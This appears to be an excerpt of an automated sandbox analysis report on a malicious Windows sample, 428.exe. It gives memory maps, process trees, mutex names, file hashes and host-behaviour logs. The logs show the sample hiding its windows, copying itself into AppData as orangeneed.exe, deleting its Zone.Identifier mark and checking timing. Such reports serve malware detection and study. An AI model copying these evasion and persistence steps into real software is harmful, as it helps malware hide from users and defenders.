comctl32.dll	0x743d0000	0x7456dfff	Memory Mapped File	rwx	-
esent.dll	0x74820000	0x749c2fff	Memory Mapped File	rwx	-
dwmapi.dll	0x74a10000	0x74a22fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74ac0000	0x74ac7fff	Memory Mapped File	rwx	-
wow64win.dll	0x74ad0000	0x74b2bfff	Memory Mapped File	rwx	-
wow64.dll	0x74b30000	0x74b6efff	Memory Mapped File	rwx	-
rasman.dll	0x74c00000	0x74c14fff	Memory Mapped File	rwx	-
rasapi32.dll	0x74c20000	0x74c71fff	Memory Mapped File	rwx	-
winspool.drv	0x74c80000	0x74cd0fff	Memory Mapped File	rwx	-
msvfw32.dll	0x74ce0000	0x74d00fff	Memory Mapped File	rwx	-
dciman32.dll	0x74d10000	0x74d15fff	Memory Mapped File	rwx	-
ddraw.dll	0x74d20000	0x74e06fff	Memory Mapped File	rwx	-
glu32.dll	0x74e10000	0x74e31fff	Memory Mapped File	rwx	-
opengl32.dll	0x74e40000	0x74f07fff	Memory Mapped File	rwx	-
secur32.dll	0x74f10000	0x74f17fff	Memory Mapped File	rwx	-
winmm.dll	0x74f20000	0x74f51fff	Memory Mapped File	rwx	-
msacm32.dll	0x74f60000	0x74f73fff	Memory Mapped File	rwx	-
ntdsapi.dll	0x74f80000	0x74f97fff	Memory Mapped File	rwx	-
cryptbase.dll	0x75180000	0x7518bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75190000	0x751effff	Memory Mapped File	rwx	-
devobj.dll	0x751f0000	0x75201fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x75210000	0x752fffff	Memory Mapped File	rwx	-
ws2_32.dll	0x75300000	0x75334fff	Memory Mapped File	rwx	-
gdi32.dll	0x753d0000	0x7545ffff	Memory Mapped File	rwx	-
setupapi.dll	0x75530000	0x756ccfff	Memory Mapped File	rwx	-
shlwapi.dll	0x756d0000	0x75726fff	Memory Mapped File	rwx	-
kernel32.dll	0x75730000	0x7583ffff	Memory Mapped File	rwx	-
nsi.dll	0x75840000	0x75845fff	Memory Mapped File	rwx	-
kernelbase.dll	0x75850000	0x75895fff	Memory Mapped File	rwx	-
psapi.dll	0x758a0000	0x758a4fff	Memory Mapped File	rwx	-
msasn1.dll	0x758b0000	0x758bbfff	Memory Mapped File	rwx	-
wininet.dll	0x758d0000	0x759c4fff	Memory Mapped File	rwx	-
advapi32.dll	0x759d0000	0x75a6ffff	Memory Mapped File	rwx	-
usp10.dll	0x75b00000	0x75b9cfff	Memory Mapped File	rwx	-
urlmon.dll	0x75ba0000	0x75cd5fff	Memory Mapped File	rwx	-
msctf.dll	0x75ce0000	0x75dabfff	Memory Mapped File	rwx	-
iertutil.dll	0x75db0000	0x75faafff	Memory Mapped File	rwx	-
ole32.dll	0x75fb0000	0x7610bfff	Memory Mapped File	rwx	-
shell32.dll	0x76110000	0x76d59fff	Memory Mapped File	rwx	-
imm32.dll	0x76d60000	0x76dbffff	Memory Mapped File	rwx	-
user32.dll	0x76dc0000	0x76ebffff	Memory Mapped File	rwx	-
sechost.dll	0x76ec0000	0x76ed8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x76ee0000	0x76f6efff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x76f70000	0x76f96fff	Memory Mapped File	rwx	-
msvcrt.dll	0x76fa0000	0x7704bfff	Memory Mapped File	rwx	-
crypt32.dll	0x770e0000	0x771fcfff	Memory Mapped File	rwx	-
wintrust.dll	0x77200000	0x7722cfff	Memory Mapped File	rwx	-
private_0x0000000077230000	0x77230000	0x77329fff	Private Memory	rwx	-
private_0x0000000077330000	0x77330000	0x7744efff	Private Memory	rwx	-
ntdll.dll	0x77450000	0x775f8fff	Memory Mapped File	rwx	-
lpk.dll	0x77600000	0x77609fff	Memory Mapped File	rwx	-
ntdll.dll	0x77630000	0x777affff	Memory Mapped File	rwx	-
private_0x000000007ef50000	0x7ef50000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Host Behavior

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\Public\428.exe	os_pid = 0x8d0, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE		1	Fn

Module (263)

Operation	Module	Additional Information	Count	Logfile
Load	USER32.dll	base_address = 0x76dc0000	1	Fn
Load	KERNEL32.dll	base_address = 0x75730000	1	Fn
Get Handle	c:\users\public\428.exe	base_address = 0x400000	1	Fn
Get Filename	-	process_name = c:\users\public\428.exe, file_name_orig = C:\Users\Public\428.exe, size = 260	1	Fn
Get Address	-	function = VirtualAlloc, ordinal = 0, address_out = 0x18f8ec	249	Fn
Get Address	-	function = LoadLibraryA, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = GetProcAddress, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = VirtualAlloc, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = VirtualProtect, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = wsprintfA, address_out = 0x76deae5f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeConsole, address_out = 0x757e6aa8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpA, address_out = 0x7575eceb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x757411c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x757411a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75741809	1	Fn

Mutex (2)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = PEMB64		1	Fn
Create	mutex_name = PEM8D4		1	Fn

Process #5: 428.exe

302

Information	Value
ID	#5
File Name	c:\users\public\428.exe
Command Line	"C:\Users\Public\428.exe"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:55, Reason: Child Process
Unmonitor	End Time: 00:02:05, Reason: Self Terminated
Monitor Duration	00:00:10

OS Process Information

Information	Value
PID	0x8d0
Parent PID	0x8d4 (c:\users\public\428.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 8D8 0x 8DC 0x 8C0 0x 970

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	r	-
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	r	-
private_0x0000000000220000	0x00220000	0x002dffff	Private Memory	rw	-
pagefile_0x00000000002e0000	0x002e0000	0x002e6fff	Pagefile Backed Memory	r	-
private_0x00000000002f0000	0x002f0000	0x0036ffff	Private Memory	rw	-
pagefile_0x0000000000370000	0x00370000	0x00371fff	Pagefile Backed Memory	rw	-
msvfw32.dll.mui	0x00380000	0x00381fff	Memory Mapped File	rw	-
pagefile_0x0000000000390000	0x00390000	0x00391fff	Pagefile Backed Memory	r	-
private_0x00000000003a0000	0x003a0000	0x003b5fff	Private Memory	rw	-
private_0x00000000003c0000	0x003c0000	0x003d6fff	Private Memory	rwx	-
private_0x00000000003e0000	0x003e0000	0x003f6fff	Private Memory	rw	-
428.exe	0x00400000	0x0045dfff	Memory Mapped File	rwx	-
private_0x0000000000460000	0x00460000	0x0055ffff	Private Memory	rw	-
private_0x0000000000560000	0x00560000	0x0056ffff	Private Memory	rwx	-
private_0x0000000000570000	0x00570000	0x0057ffff	Private Memory	rw	-
pagefile_0x0000000000570000	0x00570000	0x00577fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000570000	0x00570000	0x00570fff	Pagefile Backed Memory	rw	-
private_0x0000000000580000	0x00580000	0x0058ffff	Private Memory	rw	-
pagefile_0x0000000000590000	0x00590000	0x00597fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000590000	0x00590000	0x00591fff	Pagefile Backed Memory	r	-
private_0x00000000005a0000	0x005a0000	0x0069ffff	Private Memory	rw	-
pagefile_0x00000000006a0000	0x006a0000	0x00827fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000830000	0x00830000	0x009b0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000009c0000	0x009c0000	0x01dbffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001dc0000	0x01dc0000	0x021b2fff	Pagefile Backed Memory	r	-
private_0x00000000021c0000	0x021c0000	0x0234ffff	Private Memory	rw	-
pagefile_0x00000000021c0000	0x021c0000	0x0229efff	Pagefile Backed Memory	r	-
private_0x00000000022a0000	0x022a0000	0x022dffff	Private Memory	rw	-
pagefile_0x00000000022e0000	0x022e0000	0x022e0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000022f0000	0x022f0000	0x022f0fff	Pagefile Backed Memory	r	-
cversions.1.db	0x02300000	0x02303fff	Memory Mapped File	r	-
cversions.2.db	0x02300000	0x02303fff	Memory Mapped File	r	-
private_0x0000000002310000	0x02310000	0x0234ffff	Private Memory	rw	-
private_0x0000000002350000	0x02350000	0x0238ffff	Private Memory	rw	-
pagefile_0x0000000002390000	0x02390000	0x02390fff	Pagefile Backed Memory	rw	-
private_0x00000000023a0000	0x023a0000	0x023affff	Private Memory	rw	-
sortdefault.nls	0x023b0000	0x0267efff	Memory Mapped File	r	-
private_0x0000000002680000	0x02680000	0x0277ffff	Private Memory	rw	-
pagefile_0x0000000002780000	0x02780000	0x027dbfff	Pagefile Backed Memory	r	-
private_0x0000000002780000	0x02780000	0x0287ffff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x028bffff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x029bffff	Private Memory	rw	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x029c0000	0x029dffff	Memory Mapped File	r	-
private_0x00000000029e0000	0x029e0000	0x02ae0fff	Private Memory	rw	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db	0x029e0000	0x02a0ffff	Memory Mapped File	r	-
cversions.2.db	0x02a10000	0x02a13fff	Memory Mapped File	r	-
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x02a20000	0x02a85fff	Memory Mapped File	r	-
private_0x0000000002a90000	0x02a90000	0x02b90fff	Private Memory	rw	-
pagefile_0x0000000002a90000	0x02a90000	0x02a90fff	Pagefile Backed Memory	rw	-
propsys.dll	0x742d0000	0x743c4fff	Memory Mapped File	rwx	-
comctl32.dll	0x743d0000	0x7456dfff	Memory Mapped File	rwx	-
esent.dll	0x74820000	0x749c2fff	Memory Mapped File	rwx	-
dwmapi.dll	0x74a10000	0x74a22fff	Memory Mapped File	rwx	-
uxtheme.dll	0x74a30000	0x74aaffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74ac0000	0x74ac7fff	Memory Mapped File	rwx	-
wow64win.dll	0x74ad0000	0x74b2bfff	Memory Mapped File	rwx	-
wow64.dll	0x74b30000	0x74b6efff	Memory Mapped File	rwx	-
cryptsp.dll	0x74bb0000	0x74bc5fff	Memory Mapped File	rwx	-
ntmarta.dll	0x74bd0000	0x74bf0fff	Memory Mapped File	rwx	-
rasman.dll	0x74c00000	0x74c14fff	Memory Mapped File	rwx	-
rasapi32.dll	0x74c20000	0x74c71fff	Memory Mapped File	rwx	-
winspool.drv	0x74c80000	0x74cd0fff	Memory Mapped File	rwx	-
msvfw32.dll	0x74ce0000	0x74d00fff	Memory Mapped File	rwx	-
dciman32.dll	0x74d10000	0x74d15fff	Memory Mapped File	rwx	-
ddraw.dll	0x74d20000	0x74e06fff	Memory Mapped File	rwx	-
glu32.dll	0x74e10000	0x74e31fff	Memory Mapped File	rwx	-
opengl32.dll	0x74e40000	0x74f07fff	Memory Mapped File	rwx	-
secur32.dll	0x74f10000	0x74f17fff	Memory Mapped File	rwx	-
winmm.dll	0x74f20000	0x74f51fff	Memory Mapped File	rwx	-
msacm32.dll	0x74f60000	0x74f73fff	Memory Mapped File	rwx	-
ntdsapi.dll	0x74f80000	0x74f97fff	Memory Mapped File	rwx	-
cryptbase.dll	0x75180000	0x7518bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75190000	0x751effff	Memory Mapped File	rwx	-
devobj.dll	0x751f0000	0x75201fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x75210000	0x752fffff	Memory Mapped File	rwx	-
ws2_32.dll	0x75300000	0x75334fff	Memory Mapped File	rwx	-
clbcatq.dll	0x75340000	0x753c2fff	Memory Mapped File	rwx	-
gdi32.dll	0x753d0000	0x7545ffff	Memory Mapped File	rwx	-
wldap32.dll	0x754e0000	0x75524fff	Memory Mapped File	rwx	-
setupapi.dll	0x75530000	0x756ccfff	Memory Mapped File	rwx	-
shlwapi.dll	0x756d0000	0x75726fff	Memory Mapped File	rwx	-
kernel32.dll	0x75730000	0x7583ffff	Memory Mapped File	rwx	-
nsi.dll	0x75840000	0x75845fff	Memory Mapped File	rwx	-
kernelbase.dll	0x75850000	0x75895fff	Memory Mapped File	rwx	-
psapi.dll	0x758a0000	0x758a4fff	Memory Mapped File	rwx	-
msasn1.dll	0x758b0000	0x758bbfff	Memory Mapped File	rwx	-
wininet.dll	0x758d0000	0x759c4fff	Memory Mapped File	rwx	-
advapi32.dll	0x759d0000	0x75a6ffff	Memory Mapped File	rwx	-
usp10.dll	0x75b00000	0x75b9cfff	Memory Mapped File	rwx	-
urlmon.dll	0x75ba0000	0x75cd5fff	Memory Mapped File	rwx	-
msctf.dll	0x75ce0000	0x75dabfff	Memory Mapped File	rwx	-
iertutil.dll	0x75db0000	0x75faafff	Memory Mapped File	rwx	-
ole32.dll	0x75fb0000	0x7610bfff	Memory Mapped File	rwx	-
shell32.dll	0x76110000	0x76d59fff	Memory Mapped File	rwx	-
imm32.dll	0x76d60000	0x76dbffff	Memory Mapped File	rwx	-
user32.dll	0x76dc0000	0x76ebffff	Memory Mapped File	rwx	-
sechost.dll	0x76ec0000	0x76ed8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x76ee0000	0x76f6efff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x76f70000	0x76f96fff	Memory Mapped File	rwx	-
msvcrt.dll	0x76fa0000	0x7704bfff	Memory Mapped File	rwx	-
crypt32.dll	0x770e0000	0x771fcfff	Memory Mapped File	rwx	-
wintrust.dll	0x77200000	0x7722cfff	Memory Mapped File	rwx	-
private_0x0000000077230000	0x77230000	0x77329fff	Private Memory	rwx	-
private_0x0000000077330000	0x77330000	0x7744efff	Private Memory	rwx	-
ntdll.dll	0x77450000	0x775f8fff	Memory Mapped File	rwx	-
lpk.dll	0x77600000	0x77609fff	Memory Mapped File	rwx	-
ntdll.dll	0x77630000	0x777affff	Memory Mapped File	rwx	-
private_0x000000007ef4d000	0x7ef4d000	0x7ef4ffff	Private Memory	rw	-
private_0x000000007ef50000	0x7ef50000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	rw	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	368.00 KB	MD5: f166d8ca89010fa277c8ffc1f1585db9 SHA1: 4c3b883cab722a3f8a5839dcebc3997f63ba4dcd SHA256: a30e3ad64db6f92fb3904edef6f96225a82f8a8262611e340cef0a960f290987 SSDeep: 6144:gZurs4foT7Pyk9Ov4l2hhJb1wCqhu6Oh9DOOqsJMBmP4:gQsF719ChbZ7yOqsUs4		... File Actions Show Properties Download

Host Behavior

File (12)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\Public\428.exe	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Users\Public\428.exe	type = size	1	Fn
Get Info	C:\	type = file_attributes	1	Fn
Get Info	C:\Users\	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Microsoft\	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\	type = file_attributes	1	Fn
Move	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	source_filename = C:\Users\Public\428.exe	1	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\footerdroid.exe	-	1	Fn
Delete	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe:Zone.Identifier	-	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe	os_pid = 0x9cc, show_window = SW_HIDE		1	Fn

Module (270)

Operation	Module	Additional Information	Count	Logfile
Load	USER32.dll	base_address = 0x76dc0000	1	Fn
Load	KERNEL32.dll	base_address = 0x75730000	1	Fn
Load	user32.dll	base_address = 0x76dc0000	1	Fn
Load	advapi32.dll	base_address = 0x759d0000	1	Fn
Load	shell32.dll	base_address = 0x76110000	1	Fn
Get Handle	c:\users\public\428.exe	base_address = 0x400000	3	Fn
Get Filename	-	process_name = c:\users\public\428.exe, file_name_orig = C:\Users\Public\428.exe, size = 260	1	Fn
Get Address	-	function = VirtualAlloc, ordinal = 0, address_out = 0x18f8ec	249	Fn
Get Address	-	function = LoadLibraryA, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = GetProcAddress, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = VirtualAlloc, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	-	function = VirtualProtect, ordinal = 0, address_out = 0x18f994	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = wsprintfA, address_out = 0x76deae5f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeConsole, address_out = 0x757e6aa8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpA, address_out = 0x7575eceb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x757411c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x757411a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75741809	1	Fn
Create Mapping	C:\Users\Public\428.exe	filename = C:\Users\Public\428.exe, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Map	C:\Users\Public\428.exe	process_name = c:\users\public\428.exe, desired_access = FILE_MAP_READ	1	Fn

Service (1)

Operation	Additional Information	Success	Count	Logfile
Open Manager	database_name = SERVICES_ACTIVE_DATABASE		1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	-	class_name = LDWCN705BA84C, wndproc_parameter = 0		1	Fn

System (12)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = YKYD69Q	1	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = Ticks, time = 178979	3	Fn
Get Time	type = Ticks, time = 180009	1	Fn
Get Time	type = Ticks, time = 181054	1	Fn
Get Time	type = Ticks, time = 182068	1	Fn
Get Time	type = Ticks, time = 183098	1	Fn
Get Time	type = Ticks, time = 184112	1	Fn
Get Time	type = Ticks, time = 186093	1	Fn
Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn

Mutex (4)

Operation	Additional Information	Count	Logfile
Create	mutex_name = PEM8D4	1	Fn
Create	mutex_name = Global\I705BA84C	1	Fn
Create	mutex_name = Global\M705BA84C	1	Fn
Release	mutex_name = Global\I705BA84C	1	Fn

Process #6: orangeneed.exe

266

Information	Value
ID	#6
File Name	c:\users\aetadzjz\appdata\local\microsoft\windows\orangeneed.exe
Command Line	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:02:03, Reason: Child Process
Unmonitor	End Time: 00:02:05, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

Information	Value
PID	0x9cc
Parent PID	0x8d0 (c:\users\public\428.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 138

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	r	-
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	r	-
pagefile_0x0000000000220000	0x00220000	0x00226fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	rw	-
msvfw32.dll.mui	0x00240000	0x00241fff	Memory Mapped File	rw	-
pagefile_0x0000000000250000	0x00250000	0x00251fff	Pagefile Backed Memory	r	-
private_0x0000000000260000	0x00260000	0x002dffff	Private Memory	rw	-
private_0x00000000002e0000	0x002e0000	0x0039ffff	Private Memory	rw	-
private_0x00000000003a0000	0x003a0000	0x003b5fff	Private Memory	rw	-
private_0x00000000003c0000	0x003c0000	0x003d6fff	Private Memory	rwx	-
private_0x00000000003e0000	0x003e0000	0x003f6fff	Private Memory	rw	-
428.exe	0x00400000	0x0045dfff	Memory Mapped File	rwx	-
private_0x0000000000460000	0x00460000	0x0046ffff	Private Memory	rwx	-
private_0x0000000000470000	0x00470000	0x0047ffff	Private Memory	rw	-
pagefile_0x0000000000470000	0x00470000	0x00476fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000480000	0x00480000	0x00486fff	Pagefile Backed Memory	rw	-
private_0x0000000000510000	0x00510000	0x0060ffff	Private Memory	rw	-
pagefile_0x0000000000610000	0x00610000	0x00797fff	Pagefile Backed Memory	r	-
private_0x00000000007a0000	0x007a0000	0x007affff	Private Memory	rw	-
pagefile_0x00000000007b0000	0x007b0000	0x00930fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000940000	0x00940000	0x01d3ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001d40000	0x01d40000	0x02132fff	Pagefile Backed Memory	r	-
private_0x0000000002140000	0x02140000	0x0223ffff	Private Memory	rw	-
private_0x0000000002420000	0x02420000	0x0242ffff	Private Memory	rw	-
sortdefault.nls	0x02430000	0x026fefff	Memory Mapped File	r	-
comctl32.dll	0x743d0000	0x7456dfff	Memory Mapped File	rwx	-
esent.dll	0x74820000	0x749c2fff	Memory Mapped File	rwx	-
dwmapi.dll	0x74a10000	0x74a22fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74ac0000	0x74ac7fff	Memory Mapped File	rwx	-
wow64win.dll	0x74ad0000	0x74b2bfff	Memory Mapped File	rwx	-
wow64.dll	0x74b30000	0x74b6efff	Memory Mapped File	rwx	-
rasman.dll	0x74c00000	0x74c14fff	Memory Mapped File	rwx	-
rasapi32.dll	0x74c20000	0x74c71fff	Memory Mapped File	rwx	-
winspool.drv	0x74c80000	0x74cd0fff	Memory Mapped File	rwx	-
msvfw32.dll	0x74ce0000	0x74d00fff	Memory Mapped File	rwx	-
dciman32.dll	0x74d10000	0x74d15fff	Memory Mapped File	rwx	-
ddraw.dll	0x74d20000	0x74e06fff	Memory Mapped File	rwx	-
glu32.dll	0x74e10000	0x74e31fff	Memory Mapped File	rwx	-
opengl32.dll	0x74e40000	0x74f07fff	Memory Mapped File	rwx	-
secur32.dll	0x74f10000	0x74f17fff	Memory Mapped File	rwx	-
winmm.dll	0x74f20000	0x74f51fff	Memory Mapped File	rwx	-
msacm32.dll	0x74f60000	0x74f73fff	Memory Mapped File	rwx	-
ntdsapi.dll	0x74f80000	0x74f97fff	Memory Mapped File	rwx	-
cryptbase.dll	0x75180000	0x7518bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75190000	0x751effff	Memory Mapped File	rwx	-
devobj.dll	0x751f0000	0x75201fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x75210000	0x752fffff	Memory Mapped File	rwx	-
ws2_32.dll	0x75300000	0x75334fff	Memory Mapped File	rwx	-
gdi32.dll	0x753d0000	0x7545ffff	Memory Mapped File	rwx	-
setupapi.dll	0x75530000	0x756ccfff	Memory Mapped File	rwx	-
shlwapi.dll	0x756d0000	0x75726fff	Memory Mapped File	rwx	-
kernel32.dll	0x75730000	0x7583ffff	Memory Mapped File	rwx	-
nsi.dll	0x75840000	0x75845fff	Memory Mapped File	rwx	-
kernelbase.dll	0x75850000	0x75895fff	Memory Mapped File	rwx	-
psapi.dll	0x758a0000	0x758a4fff	Memory Mapped File	rwx	-
msasn1.dll	0x758b0000	0x758bbfff	Memory Mapped File	rwx	-
wininet.dll	0x758d0000	0x759c4fff	Memory Mapped File	rwx	-
advapi32.dll	0x759d0000	0x75a6ffff	Memory Mapped File	rwx	-
usp10.dll	0x75b00000	0x75b9cfff	Memory Mapped File	rwx	-
urlmon.dll	0x75ba0000	0x75cd5fff	Memory Mapped File	rwx	-
msctf.dll	0x75ce0000	0x75dabfff	Memory Mapped File	rwx	-
iertutil.dll	0x75db0000	0x75faafff	Memory Mapped File	rwx	-
ole32.dll	0x75fb0000	0x7610bfff	Memory Mapped File	rwx	-
shell32.dll	0x76110000	0x76d59fff	Memory Mapped File	rwx	-
imm32.dll	0x76d60000	0x76dbffff	Memory Mapped File	rwx	-
user32.dll	0x76dc0000	0x76ebffff	Memory Mapped File	rwx	-
sechost.dll	0x76ec0000	0x76ed8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x76ee0000	0x76f6efff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x76f70000	0x76f96fff	Memory Mapped File	rwx	-
msvcrt.dll	0x76fa0000	0x7704bfff	Memory Mapped File	rwx	-
crypt32.dll	0x770e0000	0x771fcfff	Memory Mapped File	rwx	-
wintrust.dll	0x77200000	0x7722cfff	Memory Mapped File	rwx	-
private_0x0000000077230000	0x77230000	0x77329fff	Private Memory	rwx	-
private_0x0000000077330000	0x77330000	0x7744efff	Private Memory	rwx	-
ntdll.dll	0x77450000	0x775f8fff	Memory Mapped File	rwx	-
lpk.dll	0x77600000	0x77609fff	Memory Mapped File	rwx	-
ntdll.dll	0x77630000	0x777affff	Memory Mapped File	rwx	-
private_0x000000007ef50000	0x7ef50000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
